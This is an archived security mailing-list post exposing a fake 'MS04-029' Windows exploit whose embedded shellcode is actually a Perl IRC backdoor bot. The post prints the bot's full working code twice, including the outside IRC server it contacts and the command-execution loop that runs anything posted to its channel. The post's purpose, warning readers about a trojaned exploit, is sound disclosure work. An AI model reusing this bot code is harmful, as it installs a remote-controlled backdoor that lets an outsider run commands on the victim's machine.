lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: emilio at inf.ufsc.br (Emílio Wuerges)
Subject: New Remote Windows Exploit (MS04-029)

It was much more easier to do:

$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use 
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print 
$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) 
/){$mode=$1;last if 
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK 
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan 
:Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN 
$chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* 
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG 
$chan :$_\n";sleep 1;}}}#/tmp/hi
*** MaxLoad (windows rpc exploit) v.1 ***
For educational propose only!
error: you must enter a valid ip
usage:%s [IP-ADDRESS]
e.g: %s 192.168.1.23
error in ip address: sscanf
error: alignment could not be done
://[
Successfully send payload!
Try connect to %s port 31337
/tmp/hi


Tada!!


-- 
Em?lio Wuerges
--
Ci?ncias da Computa??o (cco021)
Universidade Federal de Santa Catarina
--

--
Once you've seen one nuclear war, you've seen them all.
--



Barrie Dempster wrote:

>Excellent exploit, I'm sure no one will spot that perl IRC bot in there,
>nope no one will see that...
>
>(hint for the readers, try looking at the ascii out put of the "char
>*shellcode_payload=" data, looks a little like the following....)
>
>[code]
>#!/usr/bin/perl
>$c
>han="#0x";$nick="k
>";$server="ir3ip.n
>et";$SIG{TERM}={};
>exit if fork;use I
>O::Socket;$sock =
>IO::Socket::INET->
>new($server.":6667
>")||exit;print $so
>ck "USER k +i k :k
>v1\nNICK k\n";$i=1
>;while(<$sock>=~/^
>[^ ]+ ([^ ]+) /){$
>mode=$1;last if $m
>ode=="001";if($mod
>e=="433"){$i++;$ni
>ck=~s/\d*$/$i/;pri
>nt $sock "NICK $ni
>ck\n";}}print $soc
>k "JOIN $chan\nPRI
>VMSG $chan :Hi\n";
>while(<$sock>){if
>(/^PING (.*)$/){pr
>int $sock "PONG $1
>\nJOIN $chan\n";}i
>f(s/^[^ ]+ PRIVMSG
> $chan :$nick[^ :\
>w]*:[^ :\w]* (.*)$
>/$1/){s/\s*$//;$_=
>`$_`;foreach(split
> "\n"){print $sock
> "PRIVMSG $chan :$
>_\n";sleep 1;}}}#/
>tmp/hi
>
>[/code]
>
>--
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
>  http://www.bsrf.org.uk
>
>[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
>
>
>
>  
>


Powered by blists - more mailing lists